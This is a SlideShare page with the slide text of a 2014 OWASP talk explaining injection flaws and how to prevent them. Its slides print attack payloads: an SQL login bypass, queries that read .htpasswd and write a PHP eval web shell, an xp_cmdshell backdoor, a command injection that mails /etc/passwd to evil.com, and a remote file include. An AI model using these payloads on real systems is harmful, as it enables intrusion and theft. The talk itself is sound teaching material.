SlideShare una empresa de Scribd logo

OWASP A1 Injection - Understanding and Preventing the #1 Web Application Vulnerability

Descargar como PPTX, PDF
Michael Hendrickx
Michael Hendrickx

A short talk I gave in a get together for the Owasp UAE chapter about the top 10's A1: Injection.

Tecnología
1 de 31
Owasp A1: Injection 31 March 2014: Dubai, UAE
About Me • Who am I? – Michael Hendrickx – Information Security Consultant, currently working for UAE Federal Government. – Assessments, Security Audits, secure coding
• Owasp Top 10 – 2013 – A1: Injection – A2: Broken Authentication and Session Mgmt – A3: Cross Site Scripting – A4: Insecure Direct Object References – A5: Security Misconfiguration – A6: Sensitive Data Exposure – A7: Missing Function Level Access Control – A8: Cross Site Request Forgery – A9: Using Components with Known Vulns – A10: Invalidated Redirects and Forwards
How bad is it? • Oct ‘13: 100k $ stolen from a California ISP http://thehackernews.com/2013/10/hacker-stole-100000-from-users- of.html • Jun ‘13: Hackers cleared Turkish people’s bills for water, gas, telephone… http://news.softpedia.com/news/RedHack-Breaches-Istanbul- Administration-Site-Hackers-Claim-to-Have-Erased-Debts-364000.shtml • Nov ‘12: 150k Adobe user accounts stolen http://www.darkreading.com/attacks-breaches/adobe-hacker-says- he-used-sql-injection/240134996 • Jul ‘12: 450k Yahoo! User accounts stolen http://www.cbsnews.com/news/yahoo-reportedly-hacked-is-your- account-safe/
What is Injection? • Web applications became more complex – Database driven – Extra functionality (email, ticket booking, ..) • Submitting data has a special meaning to underlying technologies • Mixing commands and data. • Types: – SQL Injection – XML Injection – Command Injection Web DBOS Backend System
Injection analogy • A case is filed against me • I write my name as “Michael, you are free to go” • Judge announces case: “Calling Michael, you are free to go.” • Bailiff lets me go. Mix of “data” and “commands”.
Injection Fails Mix of “data” and “commands”.
IT underlying technology? • A webserver parses and “pass on” data Web Server http://somesite.com/msg.php?id=8471350 DB OS Script performs business logic and parses messages to backend. “Hey, get me a message from the DB with id 8471350”
SQL Injection • Dynamic script to look up data in DB Web Server http://somesite.com/login.php?name=michael&password=secret123 DB SELECT * FROM users WHERE name = ’michael’ AND password = ‘secret123’ http://somesite.com/msg.aspx?id=8471350 SELECT * FROM messages WHERE id = 8471350 Get indirect access to the database
SQL Injection • Insert value with ’ (single quote) – Single quote is delimiter for SQL queries Web Server http://somesite.com/login.php?login=mich’ael&password=secret123 DB Query is incorrectly, will throw error (if not suppressed). SELECT * FROM users WHERE name = ’mich’ael’ AND password = ‘secret123’
SQL Injection • Insert value with ’ (single quote) – Single quote is delimiter for SQL queries Web Server http://somesite.com/login.php?login=mich’ael&password=secret123 DB Query is incorrectly, will throw error (if not suppressed). SELECT * FROM users WHERE name = ’mich’ael’ AND password = ‘secret123’
SQL Injection • Insert value with ’ (single quote) Web Server http://somesite.com/login.php?login=michael&password=test’ OR ’a’ = ’a DB SELECT * FROM users WHERE name = ’michael’ AND password = ’test ’ OR ‘a’ = ‘a’ ‘a’ will always equal ‘a’, and thus log in this user.
SQL Injection • More advanced possibilities: – Read files*: • MySQL: SELECT HEX(LOAD_FILE(‘/var/www/site.com/admin/.htpasswd’)) INTO DUMPFILE ‘/var/www/site.com/htdocs/test.txt’; • MS SQL: CREATE TABLE newfile(data text); ... BULK INSERT newfile FROM ‘C:secretfile.dat’ WITH (CODEPAGE=‘RAW’, FIELDTERMINATOR=‘|’,ROWTERMINATOR=‘---’); *: If you have the right privileges
SQL Injection • Write files – MySQL: CREATE TABLE tmp(data longblog); INSERT INTO tmp(data) VALUES(0x3c3f7068); UPDATE tmp SET data=CONCAT(data, 0x20245f...); <?php $_REQUEST[e] ? eval(base64_decode($_REQUEST[e])); exit;?> ... SELECT data FROM tmp INTO DUMPFILE ‘/var/www/site.com/htdocs/test.php’; – MS SQL: CEXEC xp_cmdshell(‘echo ... >> backdoor.aspx’); *: Again, If you have the right privileges
SQL Injection: SQLMap • SQL Map will perform attacks on target. • Dumps entire tables • Even entire databases. • Stores everything in CSV • More info on http://sqlmap.org
HTML Injection • Possible to include HTML tags into fields • Used to render “special” html tags where normal text is expected • XSS possible, rewrite the DOM
HTML Injection • Possible to insert iframes, fake forms, JS, … • Can be used in phishing attack Button goes to different form, potentially stealing credentials.
XML Injection • Web app talks to backend web services • Web app’s logic converts parameters to XML web services (as SOAP, …) Web Server Web service Web service DB Backend
XML Injection http://somesite.com/create.php?name=michael&email=mh@places.ae <?xml version=“1.0” encoding=“ISO-8859-1” ?> <user> <status>new</status> <admin>false</admin> <date>25 Jan 2014, 13:10:01</date> <name>$name</name> <email>$email</email> </user> http://somesite.com/create.php?name=michael&email=a@b.c</email><admin>true</a dmin><email>mh@places.ae <?xml version=“1.0” encoding=“ISO-8859-1” ?> <user> <status>new</status> <admin>false</admin> <date>25 Jan 2014, 13:24:48</date> <name>michael</name> <email>a@b.c</email><admin>true</admin><email>mh@places.ae</email> </user> Web app to create a new user
Command Injection • Web application performs Operating System tasks – Execute external programs / scripts – List files – Send email Web Server OS
Command Injection • Dynamic script to share article Web Server DBhttp://somesite.com/share.php?to=mh@places.ae OS $ echo “check this out” | mail –s “share” mh@places.ae $ echo “check this out” | mail –s “share” mh@places.ae; mail hack@evil.com < /etc/passwd http://somesite.com/share.php?to=mh@places.ae;+mail+hack@evil.com+<+/etc/passwd
LDAP Injection • Lightweight Directory Access Protocol • LDAP is used to access information directories – Users – User information – Software – Computers Web Server LDAP Server
LDAP Injection • Insert special characters, such as (, |, &, *, … • * (asterisk) allows listing of all users http://www.networkdls.com/articles/ldapinjection.pdf
Remote File Injection • Scripts include other files to extend functionality • Why? Clarity, Reuse functionality – PHP: • include(), require(), require_once(), … – Aspx: • <!-- #include “…” --> – JSP: • <% @include file=“…” %>
Remote File Injection • Color chooser • Color will load new file with color codes (blue.php, red.php, …) • Attacker can upload malicious PHP file to an external server http://somesite.com/mypage.php?color=blue <?php if(isset($_GET[„color‟])){ include($_GET[„color‟].„.php‟); } ?> http://somesite.com/mypage.php?color=http://evil.com/evil.txt Will fetch and load http://evil.com/evil.txt.php
Remote File Injection • Theme chooser • Can input external HTML files – That can contain JavaScript, XSS, rewrite the DOM, etc... • Also verify cookie contents, … http://somesite.com/set_theme.php?theme=fancy <link href=“/themes/<? print $_COOKIE[„theme‟] ?>.css” rel=“stylesheet” type=“text/css” />
Remediation • Implement Web Application Firewall (WAF) • Prevents most common attacks – Not 100% foolproof • Make sure it can decrypt SSL Web Server DBWAF
Remediation • Validate user input, all input: – Never trust user input, ever. – Even stored input (for later use) – Force formats (numbers, email addresses, dates…) – HTTP form fields, HTTP referers, cookies, … • Apply secure coding standards – Use prepared SQL statements – Vendor specific guidelines – OWASP secure coding practices: https://www.owasp.org/images/0/08/OWASP_SCP_Quick_Reference_Guide_v2.pdf
Remediation • Adopt least-privilege policies – Give DB users least privileges – Use multiple DB users – Run processes with restricted privileges – Restrict permissions on directories • Do your web directories really need to be writable? • Run in sandboxed environment • Suppress error messages • Enable exception notifications – If something strange happens, reset session and notify administrator.
Summary • Don’t trust your user input. • Don’t trust your user input. • Adopt secure coding policies • Implement defense in depth • Do log analysis to detect anomalies • And don’t trust your user input.
Thank you! Michael Hendrickx me@michaelhendrickx.com @ndrix

Recomendados

Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Moataz Kamel
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySandip Chaudhari
 
SQL Injection
SQL Injection SQL Injection
SQL Injection Adhoura Academy
 
OWASP API Security Top 10 Examples
OWASP API Security Top 10 ExamplesOWASP API Security Top 10 Examples
OWASP API Security Top 10 Examples42Crunch
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute)
 
OWASP A4 XML External Entities (XXE)
OWASP A4 XML External Entities (XXE)OWASP A4 XML External Entities (XXE)
OWASP A4 XML External Entities (XXE)Michael Furman
 
Secure Code Warrior - Cross site scripting
Secure Code Warrior - Cross site scriptingSecure Code Warrior - Cross site scripting
Secure Code Warrior - Cross site scriptingSecure Code Warrior
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 

Recomendados

Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Moataz Kamel
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySandip Chaudhari
 
SQL Injection
SQL Injection SQL Injection
SQL Injection Adhoura Academy
 
OWASP API Security Top 10 Examples
OWASP API Security Top 10 ExamplesOWASP API Security Top 10 Examples
OWASP API Security Top 10 Examples42Crunch
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute)
 
OWASP A4 XML External Entities (XXE)
OWASP A4 XML External Entities (XXE)OWASP A4 XML External Entities (XXE)
OWASP A4 XML External Entities (XXE)Michael Furman
 
Secure Code Warrior - Cross site scripting
Secure Code Warrior - Cross site scriptingSecure Code Warrior - Cross site scripting
Secure Code Warrior - Cross site scriptingSecure Code Warrior
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesSoftware Guru
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesAbraham Aranguren
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applicationsNiyas Nazar
 
OWASP Top 10 Vulnerabilities - A5-Broken Access Control; A6-Security Misconfi...
OWASP Top 10 Vulnerabilities - A5-Broken Access Control; A6-Security Misconfi...OWASP Top 10 Vulnerabilities - A5-Broken Access Control; A6-Security Misconfi...
OWASP Top 10 Vulnerabilities - A5-Broken Access Control; A6-Security Misconfi...Lenur Dzhemiliev
 
Security testing
Security testingSecurity testing
Security testingKhizra Sammad
 
Secure code
Secure codeSecure code
Secure codeddeogun
 
Secure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopSecure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopPaul Ionescu
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim HegazyHackIT Ukraine
 
OWASP TOP 10 VULNERABILITIS
OWASP TOP 10 VULNERABILITISOWASP TOP 10 VULNERABILITIS
OWASP TOP 10 VULNERABILITISNull Bhubaneswar
 
OWASP Top 10 API Security Risks
OWASP Top 10 API Security RisksOWASP Top 10 API Security Risks
OWASP Top 10 API Security RisksIndusfacePvtLtd
 
OWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewOWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewMichael Furman
 
OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)TzahiArabov
 
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOwasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOWASP Delhi
 
OWASP API Security Top 10 - API World
OWASP API Security Top 10 - API WorldOWASP API Security Top 10 - API World
OWASP API Security Top 10 - API World42Crunch
 
How to identify and prevent SQL injection
How to identify and prevent SQL injection How to identify and prevent SQL injection
How to identify and prevent SQL injection Eguardian Global Services
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...Noppadol Songsakaew
 
How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top TenSecurity Innovation
 
Secure code practices
Secure code practicesSecure code practices
Secure code practicesHina Rawal
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectBlueinfy Solutions
 
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First SecurityDevbeat Conference - Developer First Security
Devbeat Conference - Developer First SecurityMichael Coates
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applicationsDevnology
 

Más contenido relacionado

La actualidad más candente

OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesSoftware Guru
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesAbraham Aranguren
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applicationsNiyas Nazar
 
OWASP Top 10 Vulnerabilities - A5-Broken Access Control; A6-Security Misconfi...
OWASP Top 10 Vulnerabilities - A5-Broken Access Control; A6-Security Misconfi...OWASP Top 10 Vulnerabilities - A5-Broken Access Control; A6-Security Misconfi...
OWASP Top 10 Vulnerabilities - A5-Broken Access Control; A6-Security Misconfi...Lenur Dzhemiliev
 
Secure code
Secure codeSecure code
Secure codeddeogun
 
Secure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopSecure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopPaul Ionescu
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim HegazyHackIT Ukraine
 
OWASP Top 10 API Security Risks
OWASP Top 10 API Security RisksOWASP Top 10 API Security Risks
OWASP Top 10 API Security RisksIndusfacePvtLtd
 
OWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewOWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewMichael Furman
 
OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)TzahiArabov
 
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOwasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOWASP Delhi
 
OWASP API Security Top 10 - API World
OWASP API Security Top 10 - API WorldOWASP API Security Top 10 - API World
OWASP API Security Top 10 - API World42Crunch
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...Noppadol Songsakaew
 
How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top TenSecurity Innovation
 
Secure code practices
Secure code practicesSecure code practices
Secure code practicesHina Rawal
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectBlueinfy Solutions
 

La actualidad más candente (20)

OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application Vulnerabilities
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
 
OWASP Top 10 Vulnerabilities - A5-Broken Access Control; A6-Security Misconfi...
OWASP Top 10 Vulnerabilities - A5-Broken Access Control; A6-Security Misconfi...OWASP Top 10 Vulnerabilities - A5-Broken Access Control; A6-Security Misconfi...
OWASP Top 10 Vulnerabilities - A5-Broken Access Control; A6-Security Misconfi...
 
Security testing
Security testingSecurity testing
Security testing
 
Secure code
Secure codeSecure code
Secure code
 
Secure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopSecure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa Workshop
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
 
OWASP TOP 10 VULNERABILITIS
OWASP TOP 10 VULNERABILITISOWASP TOP 10 VULNERABILITIS
OWASP TOP 10 VULNERABILITIS
 
OWASP Top 10 API Security Risks
OWASP Top 10 API Security RisksOWASP Top 10 API Security Risks
OWASP Top 10 API Security Risks
 
OWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewOWASP Top 10 2021 What's New
OWASP Top 10 2021 What's New
 
OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)
 
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOwasp top 10 vulnerabilities
Owasp top 10 vulnerabilities
 
OWASP API Security Top 10 - API World
OWASP API Security Top 10 - API WorldOWASP API Security Top 10 - API World
OWASP API Security Top 10 - API World
 
How to identify and prevent SQL injection
How to identify and prevent SQL injection How to identify and prevent SQL injection
How to identify and prevent SQL injection
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...
 
How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten
 
Secure code practices
Secure code practicesSecure code practices
Secure code practices
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open Redirect
 

Similar a OWASP A1 Injection - Understanding and Preventing the #1 Web Application Vulnerability

Devbeat Conference - Developer First Security
Devbeat Conference - Developer First SecurityDevbeat Conference - Developer First Security
Devbeat Conference - Developer First SecurityMichael Coates
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applicationsDevnology
 
Website Hacking and Preventive Measures
Website Hacking and Preventive MeasuresWebsite Hacking and Preventive Measures
Website Hacking and Preventive MeasuresShubham Takode
 
SQL Injection and DoS
SQL Injection and DoSSQL Injection and DoS
SQL Injection and DoSEmil Tan
 
Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013
Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013 Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013
Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013 Lostar
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009mirahman
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013tmd800
 
Open source security
Open source securityOpen source security
Open source securitylrigknat
 
OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012ZIONSECURITY
 
Unique Features of SQL Injection in PHP Assignment
Unique Features of SQL Injection in PHP AssignmentUnique Features of SQL Injection in PHP Assignment
Unique Features of SQL Injection in PHP AssignmentLesa Cote
 
Drupal security
Drupal securityDrupal security
Drupal securityTechday7
 
WordPress Security - WordPress Meetup Copenhagen 2013
WordPress Security - WordPress Meetup Copenhagen 2013WordPress Security - WordPress Meetup Copenhagen 2013
WordPress Security - WordPress Meetup Copenhagen 2013Thor Kristiansen
 
Web application attacks
Web application attacksWeb application attacks
Web application attackshruth
 
Web application security part 01
Web application security part 01Web application security part 01
Web application security part 01G Prachi
 

Similar a OWASP A1 Injection - Understanding and Preventing the #1 Web Application Vulnerability (20)

Devbeat Conference - Developer First Security
Devbeat Conference - Developer First SecurityDevbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
null Bangalore meet - Php Security
null Bangalore meet - Php Securitynull Bangalore meet - Php Security
null Bangalore meet - Php Security
 
Website Hacking and Preventive Measures
Website Hacking and Preventive MeasuresWebsite Hacking and Preventive Measures
Website Hacking and Preventive Measures
 
SQL Injection and DoS
SQL Injection and DoSSQL Injection and DoS
SQL Injection and DoS
 
Lets Make our Web Applications Secure
Lets Make our Web Applications SecureLets Make our Web Applications Secure
Lets Make our Web Applications Secure
 
Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013
Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013 Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013
Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013
 
PHP and MySQL
PHP and MySQLPHP and MySQL
PHP and MySQL
 
Open source security
Open source securityOpen source security
Open source security
 
Spa Secure Coding Guide
Spa Secure Coding GuideSpa Secure Coding Guide
Spa Secure Coding Guide
 
OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012
 
Unique Features of SQL Injection in PHP Assignment
Unique Features of SQL Injection in PHP AssignmentUnique Features of SQL Injection in PHP Assignment
Unique Features of SQL Injection in PHP Assignment
 
Starwest 2008
Starwest 2008Starwest 2008
Starwest 2008
 
WebApps_Lecture_15.ppt
WebApps_Lecture_15.pptWebApps_Lecture_15.ppt
WebApps_Lecture_15.ppt
 
Drupal security
Drupal securityDrupal security
Drupal security
 
WordPress Security - WordPress Meetup Copenhagen 2013
WordPress Security - WordPress Meetup Copenhagen 2013WordPress Security - WordPress Meetup Copenhagen 2013
WordPress Security - WordPress Meetup Copenhagen 2013
 
Web application attacks
Web application attacksWeb application attacks
Web application attacks
 
Web application security part 01
Web application security part 01Web application security part 01
Web application security part 01
 

Más de Michael Hendrickx

ECrime presentation - A few bits about malware
ECrime presentation - A few bits about malwareECrime presentation - A few bits about malware
ECrime presentation - A few bits about malwareMichael Hendrickx
 
Social Engineering Trickx - Owasp Doha 2015
Social Engineering Trickx - Owasp Doha 2015Social Engineering Trickx - Owasp Doha 2015
Social Engineering Trickx - Owasp Doha 2015Michael Hendrickx
 
Social Engineering - Help AG spotlight 15Q2
Social Engineering - Help AG spotlight 15Q2Social Engineering - Help AG spotlight 15Q2
Social Engineering - Help AG spotlight 15Q2Michael Hendrickx
 
Help AG spot light - social engineering
Help AG spot light - social engineeringHelp AG spot light - social engineering
Help AG spot light - social engineeringMichael Hendrickx
 
Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Michael Hendrickx
 

Más de Michael Hendrickx (7)

ECrime presentation - A few bits about malware
ECrime presentation - A few bits about malwareECrime presentation - A few bits about malware
ECrime presentation - A few bits about malware
 
The Cross Window redirect
The Cross Window redirectThe Cross Window redirect
The Cross Window redirect
 
Social Engineering Trickx - Owasp Doha 2015
Social Engineering Trickx - Owasp Doha 2015Social Engineering Trickx - Owasp Doha 2015
Social Engineering Trickx - Owasp Doha 2015
 
Social Engineering - Help AG spotlight 15Q2
Social Engineering - Help AG spotlight 15Q2Social Engineering - Help AG spotlight 15Q2
Social Engineering - Help AG spotlight 15Q2
 
Help AG spot light - social engineering
Help AG spot light - social engineeringHelp AG spot light - social engineering
Help AG spot light - social engineering
 
Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)
 
Webpage Proxying
Webpage ProxyingWebpage Proxying
Webpage Proxying
 

Último

My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...HostedbyConfluent
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?XfilesPro
 
Azure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & ApplicationAzure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & ApplicationAndikSusilo4
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
